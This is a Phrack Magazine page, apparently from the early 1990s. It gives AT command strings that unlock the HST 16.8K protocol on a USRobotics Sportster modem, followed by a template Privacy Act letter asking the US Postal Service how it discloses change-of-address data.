- - - - - - - - -

All letters sent to Gray Areas are presumed to be for publication unless you
specifically request that they omit your name or refrain from publishing your
comments.  If you are writing about something which could incriminate yourself,
they will protect your identity as a matter of policy.

******************************************************************************

                "Turning your USR Sportster w/ 4.1 roms
                    into a 16.8K HST Dual Standard"

                                   by

                      The Sausage with The Mallet


If you have a USRobotics Sportster FAX modem, Ver 4.1, you can issue
the following commands to it to turn it into an HST 16.8K dual standard.
In effect, you add HST 16.8K to its V32.bis 14.4k capability.

ats11=40v1L3x4&h1&r2&b1e1b1&m4&a3&k3
atgw03c6,22gw05cd,2f
ats14=1s24=150s26=1s32=8s34=0x7&w

A very important item is the b1, which tells the modem to use
the 16.8K HST protocol.  If you do not set b1, when the Sportster
connects with another V32 modem it will go through the CCITT v.32
connect tones and you will not get a 16.8K connect.

If you do get an HST connect, you will not hear the "normal"
train phase--instead you will hear the HST negotiation which
sounds like a 2400 baud carrier.

Finally, if you change the "cd" in the second line to a "cb", your
modem will think it is a V.32 Courier instead of an HST 16.8K.

Look for other pfine pfiles from Rancid Bacon Productions in conjunction
with USDA Grade A Hackers (UGAH.)  Accept no substitutes.

*******************************************************************************

   Request to Post Office on Selling of Personal Information

    In May 1992, the US Postal Service testified before the US House of
 Representatives' Government Operations Subcommittee that National Change of
 Address (NCOA) information filled out by each postal patron who moves and
 files that move with the Post Office to have their mail forwarded is sold to
 direct marketing firms without the person's consent and without informing
 them of the disclosure. These records are then used to target people who
 have recently moved and by private detective agencies to trace people, among
 other uses. There is no way, except by not filling out the NCOA form, to
 prevent this disclosure.

    This letter is to request information on why your personal information
 was disclosed  and what uses are being made of it. Patrons who send in this
 letter are encouraged to also forward it and any replies to their
 Congressional Representative and Senators.


 Eligible requestors: Anyone who has filed a change of address notice with
 the Postal Service within the last five years.



 Records Officer
 US Postal Service
 Washington, DC 20260                        PRIVACY ACT REQUEST


 Dear Sir/Madam:

   This is a request under the Privacy Act of 1974 (5 USC 552a). The Act
 requires the Postal Service, as a government agency, to maintain an
 accounting of the date, nature, and purpose of each disclosure of
 information about individuals. I request a copy of the accounting of all
 disclosures made of address change and mail forwarding information that I provided
 to the Postal Service. This information is maintained in USPS System of
 Records 010.010.

   On or about (date), I filed a change of address notice requesting that my
 mail be forwarded from (old address) to (new address). The name that I used
 on the change of address form was (name).

   This request includes the accounting of all disclosures made by the Postal
 Service, its contractors, and its licensees.

   I am making this request because I object to the Postal Service's policy of
 disclosing this information without giving individuals an option to prevent
 release of this information. I want to learn how my information has been
 disclosed and what uses have been made of it. Please let the Postmaster
 General know that postal patrons want to have a choice in how change of
 address information is used.

   If there is a fee in excess of $5 for this information, please notify me in
 advance. Thank you for consideration of this request.


 Sincerely,



 CC: Your Congressional Representative
     US House of Representatives
     Washington, DC 20510

     Your Senators
     US Senate
     Washington, DC 20515

-------------------------------------------------------------------------------

[ News ] [ Paper Feed ] [ Issues ] [ Authors ] [ Archives ] [ Contact ]
© Copyleft 1985-2014, Phrack Magazine.